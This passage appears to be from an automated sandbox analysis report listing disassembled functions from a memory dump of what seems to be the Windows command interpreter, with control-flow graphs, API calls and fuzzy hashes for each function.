                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ConsoleMode_get_osfhandle
                                                                                                                                                                        • String ID: CMD.EXE
                                                                                                                                                                        • API String ID: 1606018815-3025314500
                                                                                                                                                                        • Opcode ID: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                                                                                                                        • Instruction ID: 8ec1ff90e9fb9a4322e3816c0ad23d2cfe31b8354a8088ccf55bb780f563b8a6
                                                                                                                                                                        • Opcode Fuzzy Hash: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                                                                                                                        • Instruction Fuzzy Hash: AC419DB6A19702CBE7159F64E8553787BA0BF9A751F449235C90EC2361DF3EA40CC70A
                                                                                                                                                                        Function 00007FF6E942C620 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 312COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 992 7ff6e942c620-7ff6e942c66f GetConsoleTitleW 993 7ff6e942c675-7ff6e942c687 call 7ff6e942af14 992->993 994 7ff6e943c5f2 992->994 999 7ff6e942c689 993->999 1000 7ff6e942c68e-7ff6e942c69d call 7ff6e942ca40 993->1000 996 7ff6e943c5fc-7ff6e943c60c GetLastError 994->996 998 7ff6e943c5e3 call 7ff6e9423278 996->998 1004 7ff6e943c5e8-7ff6e943c5ed call 7ff6e943855c 998->1004 999->1000 1000->1004 1005 7ff6e942c6a3-7ff6e942c6ac 1000->1005 1004->994 1007 7ff6e942c954-7ff6e942c95e call 7ff6e943291c 1005->1007 1008 7ff6e942c6b2-7ff6e942c6c5 call 7ff6e942b9c0 1005->1008 1013 7ff6e943c5de-7ff6e943c5e0 1007->1013 1014 7ff6e942c964-7ff6e942c96b call 7ff6e94289c0 1007->1014 1015 7ff6e942c6cb-7ff6e942c6ce 1008->1015 1016 7ff6e942c9b5-7ff6e942c9b8 call 7ff6e9435c6c 1008->1016 1013->998 1020 7ff6e942c970-7ff6e942c972 1014->1020 1015->1004 1018 7ff6e942c6d4-7ff6e942c6e9 1015->1018 1023 7ff6e942c9bd-7ff6e942c9c9 call 7ff6e943855c 1016->1023 1021 7ff6e943c616-7ff6e943c620 call 7ff6e943855c 1018->1021 1022 7ff6e942c6ef-7ff6e942c6fa 1018->1022 1020->996 1024 7ff6e942c978-7ff6e942c99a towupper 1020->1024 1025 7ff6e943c627 1021->1025 1022->1025 1026 7ff6e942c700-7ff6e942c713 1022->1026 1039 7ff6e942c9d0-7ff6e942c9d7 1023->1039 1029 7ff6e942c9a0-7ff6e942c9a9 1024->1029 1031 7ff6e943c631 1025->1031 1030 7ff6e942c719-7ff6e942c72c 1026->1030 1026->1031 1029->1029 1034 7ff6e942c9ab-7ff6e942c9af 1029->1034 1035 7ff6e943c63b 1030->1035 1036 7ff6e942c732-7ff6e942c747 call 7ff6e942d3f0 1030->1036 1031->1035 1034->1016 1037 7ff6e943c60e-7ff6e943c611 call 7ff6e944ec14 1034->1037 1042 7ff6e943c645 1035->1042 1046 7ff6e942c8ac-7ff6e942c8af 1036->1046 1047 7ff6e942c74d-7ff6e942c750 1036->1047 1037->1021 1040 7ff6e942c9dd-7ff6e943c6da SetConsoleTitleW 1039->1040 1041 7ff6e942c872-7ff6e942c8aa call 7ff6e943855c call 7ff6e9438f80 1039->1041 1040->1041 1051 7ff6e943c64e-7ff6e943c651 1042->1051 1046->1047 1050 7ff6e942c8b5-7ff6e942c8d3 wcsncmp 1046->1050 1052 7ff6e942c76a-7ff6e942c76d 1047->1052 1053 7ff6e942c752-7ff6e942c764 call 7ff6e942bd38 1047->1053 1050->1052 1058 7ff6e942c8d9 1050->1058 1059 7ff6e943c657-7ff6e943c65b 1051->1059 1060 7ff6e942c80d-7ff6e942c811 1051->1060 1056 7ff6e942c840-7ff6e942c84b call 7ff6e942cb40 1052->1056 1057 7ff6e942c773-7ff6e942c77a 1052->1057 1053->1004 1053->1052 1077 7ff6e942c856-7ff6e942c86c 1056->1077 1078 7ff6e942c84d-7ff6e942c855 call 7ff6e942cad4 1056->1078 1065 7ff6e942c780-7ff6e942c784 1057->1065 1058->1047 1059->1060 1061 7ff6e942c817-7ff6e942c81b 1060->1061 1062 7ff6e942c9e2-7ff6e942c9e7 1060->1062 1067 7ff6e942ca1b-7ff6e942ca1f 1061->1067 1068 7ff6e942c821 1061->1068 1062->1061 1069 7ff6e942c9ed-7ff6e942c9f7 call 7ff6e943291c 1062->1069 1070 7ff6e942c83d 1065->1070 1071 7ff6e942c78a-7ff6e942c7a4 wcschr 1065->1071 1067->1068 1079 7ff6e942ca25-7ff6e943c6b3 call 7ff6e9423278 1067->1079 1073 7ff6e942c824-7ff6e942c82d 1068->1073 1086 7ff6e942c9fd-7ff6e942ca00 1069->1086 1087 7ff6e943c684-7ff6e943c698 call 7ff6e9423278 1069->1087 1070->1056 1075 7ff6e942c7aa-7ff6e942c7ad 1071->1075 1076 7ff6e942c8de-7ff6e942c8f7 1071->1076 1073->1073 1080 7ff6e942c82f-7ff6e942c837 1073->1080 1082 7ff6e942c7b0-7ff6e942c7b8 1075->1082 1083 7ff6e942c900-7ff6e942c908 1076->1083 1077->1039 1077->1041 1078->1077 1079->1004 1080->1065 1080->1070 1082->1082 1088 7ff6e942c7ba-7ff6e942c7c7 1082->1088 1083->1083 1089 7ff6e942c90a-7ff6e942c915 1083->1089 1086->1061 1093 7ff6e942ca06-7ff6e942ca10 call 7ff6e94289c0 1086->1093 1087->1004 1088->1051 1094 7ff6e942c7cd-7ff6e942c7db 1088->1094 1095 7ff6e942c917 1089->1095 1096 7ff6e942c93a-7ff6e942c944 1089->1096 1093->1061 1111 7ff6e942ca16-7ff6e943c67f GetLastError call 7ff6e9423278 1093->1111 1100 7ff6e942c7e0-7ff6e942c7e7 1094->1100 1101 7ff6e942c920-7ff6e942c928 1095->1101 1103 7ff6e942ca2a-7ff6e942ca2f call 7ff6e9439158 1096->1103 1104 7ff6e942c94a 1096->1104 1106 7ff6e942c7e9-7ff6e942c7f1 1100->1106 1107 7ff6e942c800-7ff6e942c803 1100->1107 1108 7ff6e942c92a-7ff6e942c92f 1101->1108 1109 7ff6e942c932-7ff6e942c938 1101->1109 1103->1013 1104->1007 1106->1107 1112 7ff6e942c7f3-7ff6e942c7fe 1106->1112 1107->1042 1113 7ff6e942c809 1107->1113 1108->1109 1109->1096 1109->1101 1111->1004 1112->1100 1112->1107 1113->1060
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ConsoleTitlewcschr
                                                                                                                                                                        • String ID: /$:
                                                                                                                                                                        • API String ID: 2364928044-4222935259
                                                                                                                                                                        • Opcode ID: 989dfed76e83e1e5127155f56046364be98515c6956e9669bb0cf7002a0e13e4
                                                                                                                                                                        • Instruction ID: 3b65508ac54dbcb4e04fa3d5721c1d3f1109bae1e62d701170a327c3cbfcd00e
                                                                                                                                                                        • Opcode Fuzzy Hash: 989dfed76e83e1e5127155f56046364be98515c6956e9669bb0cf7002a0e13e4
                                                                                                                                                                        • Instruction Fuzzy Hash: 5BC1BE63A18642C1EB249F25D418BB962A1FF91B92F449171E91EC72D1EF3EE44CC30A
                                                                                                                                                                        Function 00007FF6E9438D80 Relevance: 9.1, APIs: 6, Instructions: 95sleepCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1171 7ff6e9438d80-7ff6e9438da2 1172 7ff6e9438da4-7ff6e9438daf 1171->1172 1173 7ff6e9438dcc 1172->1173 1174 7ff6e9438db1-7ff6e9438db4 1172->1174 1177 7ff6e9438dd1-7ff6e9438dd9 1173->1177 1175 7ff6e9438db6-7ff6e9438dbd 1174->1175 1176 7ff6e9438dbf-7ff6e9438dca Sleep 1174->1176 1175->1177 1176->1172 1178 7ff6e9438de7-7ff6e9438def 1177->1178 1179 7ff6e9438ddb-7ff6e9438de5 _amsg_exit 1177->1179 1181 7ff6e9438e46 1178->1181 1182 7ff6e9438df1-7ff6e9438e0a 1178->1182 1180 7ff6e9438e4c-7ff6e9438e54 1179->1180 1184 7ff6e9438e56-7ff6e9438e69 _initterm 1180->1184 1185 7ff6e9438e73-7ff6e9438e75 1180->1185 1181->1180 1183 7ff6e9438e0e-7ff6e9438e11 1182->1183 1186 7ff6e9438e38-7ff6e9438e3a 1183->1186 1187 7ff6e9438e13-7ff6e9438e15 1183->1187 1184->1185 1188 7ff6e9438e77-7ff6e9438e79 1185->1188 1189 7ff6e9438e80-7ff6e9438e88 1185->1189 1186->1180 1193 7ff6e9438e3c-7ff6e9438e41 1186->1193 1192 7ff6e9438e17-7ff6e9438e1b 1187->1192 1187->1193 1188->1189 1190 7ff6e9438e8a-7ff6e9438e98 call 7ff6e94394f0 1189->1190 1191 7ff6e9438eb4-7ff6e9438ec8 call 7ff6e94337d8 1189->1191 1190->1191 1201 7ff6e9438e9a-7ff6e9438eaa 1190->1201 1200 7ff6e9438ecd-7ff6e9438eda 1191->1200 1195 7ff6e9438e2d-7ff6e9438e36 1192->1195 1196 7ff6e9438e1d-7ff6e9438e29 1192->1196 1198 7ff6e9438f28-7ff6e9438f3d 1193->1198 1195->1183 1196->1195 1203 7ff6e9438edc-7ff6e9438ede exit 1200->1203 1204 7ff6e9438ee4-7ff6e9438eeb 1200->1204 1201->1191 1203->1204 1205 7ff6e9438ef9 1204->1205 1206 7ff6e9438eed-7ff6e9438ef3 _cexit 1204->1206 1205->1198 1206->1205
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4291973834-0
                                                                                                                                                                        • Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                                                                                                                        • Instruction ID: adab6265ae4a29c8c6ccc5543bd00b57ccb5e00530c78f71391e53dde17dff2c
                                                                                                                                                                        • Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                                                                                                                        • Instruction Fuzzy Hash: 3A41E433A08603C2FB51EFB0E8493B9A2A0AF54744F444435D91DC76A0DF7EE888C74A
                                                                                                                                                                        Function 00007FF6E94289C0 Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1207 7ff6e94289c0-7ff6e9428a3d memset call 7ff6e942ca40 1210 7ff6e9428ace-7ff6e9428adf 1207->1210 1211 7ff6e9428a43-7ff6e9428a71 GetDriveTypeW 1207->1211 1214 7ff6e9428aed 1210->1214 1215 7ff6e9428ae1-7ff6e9428ae8 ??_V@YAXPEAX@Z 1210->1215 1212 7ff6e9428a77-7ff6e9428a7a 1211->1212 1213 7ff6e943b411-7ff6e943b422 1211->1213 1212->1210 1216 7ff6e9428a7c-7ff6e9428a7f 1212->1216 1218 7ff6e943b430-7ff6e943b435 1213->1218 1219 7ff6e943b424-7ff6e943b42b ??_V@YAXPEAX@Z 1213->1219 1217 7ff6e9428aef-7ff6e9428b16 call 7ff6e9438f80 1214->1217 1215->1214 1216->1210 1220 7ff6e9428a81-7ff6e9428ac8 GetVolumeInformationW 1216->1220 1218->1217 1219->1218 1220->1210 1222 7ff6e943b3fc-7ff6e943b40b GetLastError 1220->1222 1222->1210 1222->1213
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$DriveErrorInformationLastTypeVolume
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 850181435-0
                                                                                                                                                                        • Opcode ID: 1c8e67db695c6f6d23b7c0e3cb32e635de602e3492999dee0d50d7fe40b8053d
                                                                                                                                                                        • Instruction ID: 9869fed1b54958058e6ae6fa7301d9dbe810692da2740397c7b43acf6dad0e59
                                                                                                                                                                        • Opcode Fuzzy Hash: 1c8e67db695c6f6d23b7c0e3cb32e635de602e3492999dee0d50d7fe40b8053d
                                                                                                                                                                        • Instruction Fuzzy Hash: 93411633608AC1CAEB618F60D8443ED77A4FF89B44F454525DA4D8BB48CF39D649C705
                                                                                                                                                                        Function 00007FF6E9434A14 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1224 7ff6e9434a14-7ff6e9434a3e GetEnvironmentStringsW 1225 7ff6e9434a40-7ff6e9434a46 1224->1225 1226 7ff6e9434aae-7ff6e9434ac5 1224->1226 1227 7ff6e9434a48-7ff6e9434a52 1225->1227 1228 7ff6e9434a59-7ff6e9434a8f GetProcessHeap HeapAlloc 1225->1228 1227->1227 1231 7ff6e9434a54-7ff6e9434a57 1227->1231 1229 7ff6e9434a91-7ff6e9434a9a memmove 1228->1229 1230 7ff6e9434a9f-7ff6e9434aa9 FreeEnvironmentStringsW 1228->1230 1229->1230 1230->1226 1231->1227 1231->1228
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434A28
                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434A66
                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434A7D
                                                                                                                                                                        • memmove.MSVCRT(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434A9A
                                                                                                                                                                        • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434AA2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: EnvironmentHeapStrings$AllocFreeProcessmemmove
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1623332820-0
                                                                                                                                                                        • Opcode ID: 7b7d5cd90c4b7fc4a2429fe2183f3170931abb96c0362b724e039f9c86480d2b
                                                                                                                                                                        • Instruction ID: d0acba7e7af0887daf801d4dc27b919591d77bf1a94f0ef43a3c8f548b21199e
                                                                                                                                                                        • Opcode Fuzzy Hash: 7b7d5cd90c4b7fc4a2429fe2183f3170931abb96c0362b724e039f9c86480d2b
                                                                                                                                                                        • Instruction Fuzzy Hash: 28118F22A18746C2DA10EF61A408279BBE0EF89F80F599134DE4E43754DE3EE449C745
                                                                                                                                                                        Function 00007FF6E9435CB4 Relevance: 7.5, APIs: 5, Instructions: 36synchronizationCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1826527819-0
                                                                                                                                                                        • Opcode ID: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                                                                                                                                        • Instruction ID: 33dcd725dfd6ba19a70528e4b2f2c4f862f578f45f21f12e5bf1576d4c302d1b
                                                                                                                                                                        • Opcode Fuzzy Hash: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                                                                                                                                        • Instruction Fuzzy Hash: 13016132908642CAE700AF65A4443B9BE60FF8A751F445130E94F823A6DF3E904CC70A
                                                                                                                                                                        Function 00007FF6E9433060 Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00007FF6E9431EA0: wcschr.MSVCRT(?,?,?,00007FF6E942286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF6E9450D54), ref: 00007FF6E9431EB3
                                                                                                                                                                        • SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF6E94292AC), ref: 00007FF6E94330CA
                                                                                                                                                                        • SetErrorMode.KERNELBASE ref: 00007FF6E94330DD
                                                                                                                                                                        • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6E94330F6
                                                                                                                                                                        • SetErrorMode.KERNELBASE ref: 00007FF6E9433106
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorMode$FullNamePathwcschr
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1464828906-0
                                                                                                                                                                        • Opcode ID: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                                                                                                                                        • Instruction ID: e26a49c189464e09b4f1fc88958a73b3d0ae1077cdee4c8a0abc078360e3db1d
                                                                                                                                                                        • Opcode Fuzzy Hash: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                                                                                                                                        • Instruction Fuzzy Hash: 70310323A08655C3EB24DF75A40827EB660EF59B94F949134DE4AC33D0DE7FA849C30A
                                                                                                                                                                        Function 00007FF6E942CA40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset
                                                                                                                                                                        • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                                                                                                                                                        • API String ID: 2221118986-3416068913
                                                                                                                                                                        • Opcode ID: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                                                                                                                                        • Instruction ID: adc56153d8a4f5a917308771b6521df14ffb690cace7d28b55b40f4fcb9fda6e
                                                                                                                                                                        • Opcode Fuzzy Hash: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                                                                                                                                        • Instruction Fuzzy Hash: 3111C223A08642C1EB54CF65E1547B92290AF88BA4F184331EE6DCB7D5DE3ED488C309
                                                                                                                                                                        Function 00007FF6E942BE00 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 120COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memsetwcschr
                                                                                                                                                                        • String ID: 2$COMSPEC
                                                                                                                                                                        • API String ID: 1764819092-1738800741
                                                                                                                                                                        • Opcode ID: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                                                                                                                                        • Instruction ID: 3a5bf441f305daf567a70258dc4e0215cee3d97320fecd91dfc8596b65f84f32
                                                                                                                                                                        • Opcode Fuzzy Hash: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                                                                                                                                        • Instruction Fuzzy Hash: 84513823E08642C5FBA59F25A4513792299BF86B84F084031DA4DCB6D6DE7EE84CC74B
